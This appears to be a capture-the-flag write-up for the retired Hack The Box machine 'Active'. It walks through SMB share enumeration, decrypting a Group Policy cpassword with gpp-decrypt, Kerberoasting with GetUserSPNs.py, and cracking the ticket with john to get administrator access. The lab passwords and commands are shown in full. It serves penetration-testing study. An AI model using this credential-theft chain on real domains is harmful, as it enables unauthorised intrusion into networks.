Hackthebox.eu - Retired - Active

Hackthebox.eu - Retired - Active

Recon

As always  I start with a simple Up/Down scan on TCP ports to see what is open

# nmap -T4 -p- -oX /root/Desktop/HTB/Active/nmapb.xml 10.10.10.100

A bunch of open ports… Let's scan again on those ports with -A to see if we can finger OS/Services

# nmap -T4 -A -p53,88,135,139,389,445,464,593,636,3268,3269,9389,47001,49152,49153,49154,49155,49157,49158,19469,49170,49180 -oX /root/Desktop/HTB/Active/nmapf.xml 10.10.10.100

Lots of ports open  53 for dns

Netbios

Ldap

Since this is a windows computer with smb let's see what we might find via smb

Exploit

Let's map the shares

Smbmap -H 10.10.10.100

There is only one share that we can connect to so let's see what's there.

oot@kali-iMac:~# smbclient //10.10.10.100/replication

Enter WORKGROUP\root's password: 

Anonymous login successful

Try "help" to get a list of possible commands.

smb: \> dir

  .                                   D 0 Sat Jul 21 03:37:44 2018

  ..                                  D 0 Sat Jul 21 03:37:44 2018

  active.htb                          D 0 Sat Jul 21 03:37:44 2018

10459647 blocks of size 4096. 4931605 blocks available

After digging around in the share I found a Groups.XML in a directory. I downloaded the file to my computer using GET 

Found a CPassword in here

cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>

</Groups>

So theoretically this cpassword is the password for active.hbt\SVC_TGS

Which is assume is an Active Directory service account.

I put the cpassword through the built in decyrption in kali to break this password gpp-decrypt

root@kali-iMac:~/Desktop# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated

GPPstillStandingStrong2k18

So let's try enumerating again with this user/pass

active.htb\SVC_TGS 

GPPstillStandingStrong2k18

Now we have access to a bunch more shares :)

OK we can now get in the Users folder

Still can't get to the admin password lets find a way to get there.

https://room362.com/post/2016/kerberoast-pt1/

Kerberoast is what we will use to get this info

"Any valid domain user can request a kerberos ticket for any domain service (or even services outside the domain as long as there is a trust there). Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. The users running these services usually are at the very least administrators on the computers for which they are a service on, but more commonly they are some sort of administrative account (Domain Admins)."

So we will use their tool to request a ticket

You will need to add 10.10.10.100  active.htb to your /etc/hosts to use this tool

# ./GetUserSPNs.py -request active.htb/SVC_TGS

Looks like we get a ticket back for the Administrators account.

I'm going to run that script again but save the output to  a file

We end up with this as a file

Now let's throw this at john using rockyou.txt to see if we can get this password

We got a pass

Ticketmaster1968

Let's use that to get to our hash for administrator

I connected up to the C$ share to see all the files under C:\ using the administrator login and pass

root

b5fc*******************

User

86d6******************